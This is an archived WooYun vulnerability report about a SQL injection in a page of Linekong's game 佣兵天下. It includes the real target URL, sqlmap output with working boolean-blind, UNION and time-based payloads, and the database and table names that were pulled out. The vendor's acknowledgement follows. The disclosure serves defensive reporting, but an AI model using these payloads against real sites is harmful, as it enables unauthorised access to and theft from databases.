当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115362

漏洞标题:蓝港科技《佣兵天下》sql注入注入第五弹

相关厂商:linekong.com

漏洞作者: 风之传说

提交时间:2015-05-22 10:49

修复时间:2015-07-09 14:38

公开时间:2015-07-09 14:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经确认,细节仅向厂商公开
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

蓝港科技《佣兵天下》sql注入注入第五弹

详细说明:

蓝港科技《佣兵天下》sql注入注入第五弹 第五个了,应该很快完了。。。
sql注入链接:
http://yb.linekong.com//wj_detail.php?userid=20
应该又是某些大黑阔找掉了的。。。

GET parameter 'userid' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] n
sqlmap identified the following injection points with a total of 52 HTTP(s) requ
ests:
---
Place: GET
Parameter: userid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userid=20' AND 2710=2710 AND 'Uzkp'='Uzkp
Type: UNION query
Title: MySQL UNION query (NULL) - 49 columns
Payload: userid=20' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71767
67a71,0x55414c4777774d776179,0x71717a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: userid=20' AND SLEEP(5) AND 'ERAe'='ERAe
---
[16:36:25] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11


来看看数据库,你们的数据库命名都挺有规则的:

available databases [2]:
[*] information_schema
[*] yb_web


来看看表,95个:

Database: yb_web
[95 tables]
+-------------------------------------+
| yb_20121122_code |
| yb_20121122_code_log |
| yb_20121122_send_code |
| yb_20121122_send_code_log |
| yb_activity_17173_log |
| yb_activity_20121122_activate_log |
| yb_activity_alllevelup_card |
| yb_activity_alllevelup_card_log |
| yb_activity_carnival_log |
| yb_activity_cashgift_log |
| yb_activity_cdkey |
| yb_activity_cj_2010 |
| yb_activity_conference_activation |
| yb_activity_conference_question |
| yb_activity_do_query_getpoint |
| yb_activity_duowan |
| yb_activity_fahao |
| yb_activity_fahao3_cdkey_state |
| yb_activity_fahao3_log |
| yb_activity_fahao4_cdkey_state |
| yb_activity_fahao4_log |
| yb_activity_firstput |
| yb_activity_flop_log |
| yb_activity_flopitems |
| yb_activity_gather120521_items |
| yb_activity_gather120521_items_log |
| yb_activity_gather120521_prize |
| yb_activity_gather120521_spend_log |
| yb_activity_gather2012_jifen_log |
| yb_activity_gather2012_oldgame_log |
| yb_activity_gather2012_qd_log |
| yb_activity_gather2012_spend_log |
| yb_activity_identify |
| yb_activity_jifen |
| yb_activity_jifen_log |
| yb_activity_lottery201206 |
| yb_activity_lottery_sign_log |
| yb_activity_privacy |
| yb_activity_question_log |
| yb_activity_question_option |
| yb_activity_question_votes |
| yb_activity_reserve_log |
| yb_activity_reserve_m_log |
| yb_activity_robnum |
| yb_activity_roulette_cdkey_state |
| yb_activity_roulette_log |
| yb_activity_salary_log |
| yb_activity_survery201104_log |
| yb_activity_survery_log |
| yb_activity_survery_media201104_log |
| yb_activity_xingzuo |
| yb_address |
| yb_article |
| yb_article_demo |
| yb_article_inserl |
| yb_build |
| yb_card_no |
| yb_channel |
| yb_columns |
| yb_comment |
| yb_demo |
| yb_download |
| yb_editors_inserl |
| yb_flash |
| yb_grading |
| yb_group |
| yb_image |
| yb_image_inserl |
| yb_lottery_promotions |
| yb_member |
| yb_pass_card_list |
| yb_pass_card_list_log |
| yb_passportstat |
| yb_question |
| yb_question_inserl |
| yb_regactivate_telphone_log |
| yb_reply |
| yb_solution |
| yb_sort |
| yb_style |
| yb_template |
| yb_topic |
| yb_topic_inserl |
| yb_tuijian |
| yb_types |
| yb_update_uninstall_log |
| yb_url |
| yb_url_inserl |
| yb_vote |
| yb_vote_inserl |
| yb_vote_option |
| yb_wj_article |
| yb_wj_article_inserl |
| yb_wj_image |
| yb_wj_image_inserl |
+-------------------------------------+

漏洞证明:

如上

修复方案:

这个你们有经验。。

版权声明:转载请注明来源 风之传说@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-05-25 14:37

厂商回复:

该游戏已下线,感谢指出的漏洞,我们已开始着手关闭该页面的操作

最新状态:

暂无


漏洞评价:

评论